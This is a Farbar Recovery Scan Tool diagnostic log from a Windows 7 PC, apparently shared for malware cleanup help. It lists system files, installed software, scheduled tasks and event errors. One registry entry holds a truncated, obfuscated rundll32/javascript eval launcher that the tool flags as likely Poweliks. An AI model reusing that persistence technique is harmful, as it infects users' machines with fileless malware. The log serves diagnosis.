2014-10-15 13:57 - 2014-09-18 20:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:57 - 2014-09-18 20:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:57 - 2014-09-18 20:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:57 - 2014-09-18 20:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:57 - 2014-09-18 20:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:57 - 2014-09-18 20:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:57 - 2014-09-18 20:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:57 - 2014-09-18 19:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:57 - 2014-09-18 19:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:57 - 2014-09-18 19:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:57 - 2014-09-04 01:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:56 - 2014-09-17 21:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:56 - 2014-09-12 21:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:56 - 2014-08-18 22:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:56 - 2014-08-18 22:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:56 - 2014-08-18 21:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:56 - 2014-07-16 21:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:56 - 2014-07-16 21:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:56 - 2014-07-16 21:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:56 - 2014-07-06 21:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:56 - 2014-07-06 21:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:56 - 2014-07-06 21:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:56 - 2014-07-06 21:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:56 - 2014-07-06 21:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:56 - 2014-06-27 20:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-01 09:16 - 2014-09-24 21:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-28 10:00 - 2011-03-21 11:19 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-28 10:00 - 2010-12-29 18:48 - 00073034 _____ () C:\Windows\PFRO.log
2014-10-28 10:00 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-28 10:00 - 2009-07-14 00:39 - 00093295 _____ () C:\Windows\setupact.log
2014-10-28 09:59 - 2010-10-16 12:07 - 01671214 _____ () C:\Windows\WindowsUpdate.log
2014-10-28 09:57 - 2009-07-13 22:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-28 09:42 - 2014-06-04 10:57 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job
2014-10-28 09:38 - 2012-08-29 09:07 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-28 09:38 - 2011-03-21 11:19 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-28 09:16 - 2012-04-03 09:22 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-27 17:26 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:26 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:25 - 2009-07-25 08:54 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-27 17:20 - 2012-05-01 10:33 - 00000000 ___RD () C:\Users\KELI\Dropbox
2014-10-27 17:19 - 2012-05-01 10:32 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Dropbox
2014-10-27 16:37 - 2009-07-13 22:37 - 00000000 ___RD () C:\Users\Public
2014-10-27 15:49 - 2014-06-04 10:56 - 00000000 ____D () C:\Users\KELI\AppData\Local\Citrix
2014-10-27 09:28 - 2012-01-10 10:25 - 00000316 _____ () C:\Windows\Tasks\HPCeeScheduleForKELI.job
2014-10-23 11:03 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-10-22 09:16 - 2010-10-16 12:11 - 00000000 ____D () C:\ProgramData\PDFC
2014-10-16 11:53 - 2010-12-29 18:49 - 00000000 ____D () C:\Scans
2014-10-16 10:24 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-10-16 09:58 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 09:27 - 2012-01-17 10:31 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-10-16 09:27 - 2011-04-12 09:27 - 00000052 _____ () C:\Windows\system32\DOErrors.log
2014-10-16 09:13 - 2009-07-14 00:33 - 00401032 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 09:12 - 2014-05-06 16:59 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 16:55 - 2013-08-14 17:10 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 16:52 - 2011-03-21 09:13 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 15:53 - 2011-03-21 11:46 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
 
Some content of TEMP:
====================
C:\Users\KELI\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpyafstv.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-27 18:50
 
==================== End Of Log ============================
 
ADDITION.TXT
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 27-10-2014 01
Ran by KELI at 2014-10-28 10:02:22
Running from C:\Users\KELI\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: McAfee® Total Protection™ for Small Business (Disabled - Out of date) {86355677-4064-3EA7-ABB3-1B136EB04637}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee® Total Protection™ for Small Business (Disabled - Out of date) {3D54B793-665E-3129-9103-206115370C8A}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Bing Bar (HKLM\...\{08234a0d-cf39-4dca-99f0-0c5cb496da81}) (Version: 6.0.2237.0 - Microsoft Corporation)
Bing Bar Platform (Version: 6.0.2237.0 - Microsoft Corporation) Hidden
Bing Rewards Client Installer (Version: 16.0.345.0 - Microsoft Corporation) Hidden
Citrix Online Launcher (HKLM\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
Google Chrome (HKLM\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Earth Plug-in (HKLM\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.5 - Google Inc.) Hidden
GoToMeeting 6.4.5.1865 (HKCU\...\GoToMeeting) (Version: 6.4.5.1865 - CitrixOnline)
Hewlett-Packard ACLM.NET v1.2.2.3 (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Customer Experience Enhancements (Version: 6.0.1.8 - Hewlett-Packard) Hidden
HP Setup (HKLM\...\{1E6219D4-027E-47EE-AB83-DD2F26E31A32}) (Version: 1.2.3557.3169 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.1.4.0 - Hewlett-Packard)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{5FEBF468-5AC2-4C66-AD80-DF85C085AA73}) (Version: 8.5.10.36 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.5.10.36 - InterVideo Inc.) Hidden
Kyocera Scanner File Utility (HKLM\...\{61C79AE1-5403-4687-AC68-28BFA5EF3895}) (Version: 3.16.9 - KyoceraMita)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Browser Protection Service (HKLM\...\McAfee SiteAdvisor) (Version: 2.5.0.6173 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Basic 2007 (HKLM\...\BASICR) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDF Complete Special Edition (HKLM\...\PDF Complete) (Version: 3.5.109 - PDF Complete, Inc)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5886 - Realtek Semiconductor Corp.)
Sophos Virus Removal Tool (HKLM\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.3 - Sophos Limited)
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
WordPerfect Office 11 (HKLM\...\{54F90B55-BEB3-4F0D-8802-228822FA5921}) (Version: 11.0 - Corel Corporation)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1350\G2MOutlookAddin.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
28-10-2014 13:40:22 ComboFix created restore point
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 22:04 - 2014-10-28 09:22 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0C92239F-3E49-499D-9AF1-C4B116AD46BB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-27] (Google Inc.)
Task: {21866111-A928-4F98-AF0C-EEAE9A8E1996} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {67385F60-249C-4354-ADD2-620471A359CC} - System32\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001 => C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe [2014-10-27] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {7375CCFD-6B94-41ED-961E-F6F9C08DAFA6} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {7F504C59-599B-49DA-A3EE-B859AC0BF85C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {87C410B8-33B3-45C6-B500-AD9A206C9502} - System32\Tasks\HPCeeScheduleForKELI => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {8A443DB3-B5C1-48D7-B440-F451210C0D61} - System32\Tasks\Registration => C:\Program Files\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-06] ()
Task: {AB8E1262-14E5-4EA0-9F63-97672EDA7F30} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-27] (Google Inc.)
Task: {EA69A0AE-1152-488A-9731-1437A029D2F6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job => C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForKELI.job => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe
 
==================== Loaded Modules (whitelisted) =============
 
2010-10-16 12:15 - 2010-10-16 12:15 - 00341280 _____ () C:\Program Files\SiteAdvisor\6173\SAService.exe
2010-10-16 12:07 - 2009-07-24 15:29 - 00077824 _____ () C:\Program Files\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2010-10-16 12:15 - 2007-08-28 16:07 - 00036640 _____ () C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
2010-10-16 12:15 - 2007-08-28 16:06 - 00910624 _____ () C:\Program Files\SiteAdvisor\6173\SiteAdv.dll
2011-03-24 20:16 - 2000-11-09 11:17 - 00190464 _____ () C:\Program Files\Kyocera\FileUtility\HgTiff2Pdf.dll
2014-10-28 10:01 - 2014-10-28 10:01 - 00043008 _____ () c:\users\keli\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpyafstv.dll
2013-08-23 15:01 - 2013-08-23 15:01 - 25100288 _____ () C:\Users\KELI\AppData\Roaming\Dropbox\bin\libcef.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-3621039740-3434257137-3815352865-500 - Administrator - Disabled)
Guest (S-1-5-21-3621039740-3434257137-3815352865-501 - Limited - Enabled)
KELI (S-1-5-21-3621039740-3434257137-3815352865-1001 - Administrator - Enabled) => C:\Users\KELI
McAfeeMVSUser (S-1-5-21-3621039740-3434257137-3815352865-1000 - Limited - Enabled)
 
==================== Faulty Device Manager Devices =============
 
Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/27/2014 06:52:13 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/27/2014 04:21:19 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\wbem\wmiprvse.exe; Description = ComboFix created restore point; Error = 0x8007043c).
 
Error: (10/27/2014 04:21:19 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007043c, This service cannot be started in Safe Mode
.
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 04:21:19 PM) (Source: VSS) (EventID: 18) (User: )
Description: Volume Shadow Copy Service error: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name IVssCoordinatorEx2 cannot be started during Safe Mode.
The Volume Shadow Copy service cannot start while in safe mode. [0x8007043c, This service cannot be started in Safe Mode
]
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 04:17:20 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\wbem\wmiprvse.exe; Description = ComboFix created restore point; Error = 0x8007043c).
 
